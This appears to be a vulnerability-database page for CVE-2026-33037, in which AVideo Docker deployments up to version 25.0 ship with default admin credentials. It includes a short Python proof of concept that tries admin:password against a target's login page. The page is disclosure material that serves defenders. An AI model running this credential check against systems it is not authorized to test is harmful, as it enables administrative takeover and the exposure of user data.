CVE-2026-33037

Description

WWBN AVideo is an open source video platform. In versions 25.0 and below, the official Docker deployment files (docker-compose.yml, env.example) ship with the admin password set to "password", which is automatically used to seed the admin account during installation, meaning any instance deployed without overriding SYSTEM_ADMIN_PASSWORD is immediately vulnerable to trivial administrative takeover. No compensating controls exist: there is no forced password change on first login, no complexity validation, no default-password detection, and the password is hashed with weak MD5. Full admin access enables user data exposure, content manipulation, and potential remote code execution via file uploads and plugin management. The same insecure-default pattern extends to database credentials (avideo/avideo), compounding the risk. Exploitation depends on operators failing to change the default, a condition likely met in quick-start, demo, and automated deployments. This issue has been fixed in version 26.0.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE

WWBN AVideo <= 25.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-33037: Default Admin Credential Takeover
# This script attempts to log in to the AVideo admin panel using default credentials.

import requests

def check_default_creds(target_url):
    login_url = f"{target_url}/user/login"
    # Default credentials mentioned in the advisory
    payload = {
        "user": "admin",
        "pass": "password",
        "submit": "Login"
    }
    
    try:
        session = requests.Session()
        response = session.post(login_url, data=payload, timeout=10)
        
        # Check if login was successful (heuristic: checking for session cookie or dashboard content)
        if response.status_code == 200 and "dashboard" in response.text.lower():
            return "[+] Vulnerable! Default credentials 'admin:password' worked."
        elif "Incorrect" in response.text or "Invalid" in response.text:
            return "[-] Not vulnerable or credentials changed."
        else:
            return "[?] Uncertain response. Manual verification recommended."
            
    except Exception as e:
        return f"[!] Error connecting to target: {e}"

if __name__ == "__main__":
    target = "http://target-ip:port"  # Replace with actual target
    print(check_default_creds(target))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33037
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33037
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33037/
[4] VulDB https://vuldb.com/cve/CVE-2026-33037
[5] https://github.com/WWBN/AVideo/commit/2075fac1a51f21fab5d8592235a095aa354a9de6
[6] https://github.com/WWBN/AVideo/security/advisories/GHSA-89rv-p523-6wg9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33037", "sourceIdentifier": "[email protected]", "published": "2026-03-20T06:16:11.817", "lastModified": "2026-03-23T16:25:29.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 25.0 and below, the official Docker deployment files (docker-compose.yml, env.example) ship with the admin password set to \"password\", which is automatically used to seed the admin account during installation, meaning any instance deployed without overriding SYSTEM_ADMIN_PASSWORD is immediately vulnerable to trivial administrative takeover. No compensating controls exist: there is no forced password change on first login, no complexity validation, no default-password detection, and the password is hashed with weak MD5. Full admin access enables user data exposure, content manipulation, and potential remote code execution via file uploads and plugin management. The same insecure-default pattern extends to database credentials (avideo/avideo), compounding the risk. Exploitation depends on operators failing to change the default, a condition likely met in quick-start, demo, and automated deployments. This issue has been fixed in version 26.0."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En las versiones 25.0 e inferiores, los archivos oficiales de despliegue de Docker (docker-compose.yml, env.example) se distribuyen con la contraseña de administrador establecida como 'password', que se utiliza automáticamente para inicializar la cuenta de administrador durante la instalación, lo que significa que cualquier instancia desplegada sin sobrescribir SYSTEM_ADMIN_PASSWORD es inmediatamente vulnerable a una toma de control administrativa trivial. No existen controles compensatorios: no hay cambio de contraseña forzado en el primer inicio de sesión, no hay validación de complejidad, no hay detección de contraseña por defecto, y la contraseña se hashea con un MD5 débil. El acceso completo de administrador permite la exposición de datos de usuario, la manipulación de contenido y la potencial ejecución remota de código a través de la carga de archivos y la gestión de plugins. El mismo patrón de valores predeterminados inseguros se extiende a las credenciales de la base de datos (avideo/avideo), lo que agrava el riesgo. La explotación depende de que los operadores no cambien el valor predeterminado, una condición que probablemente se cumpla en despliegues de inicio rápido, demostraciones y automatizados. Este problema ha sido solucionado en la versión 26.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1188"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/2075fac1a51f21fab5d8592235a095aa354a9de6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-89rv-p523-6wg9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}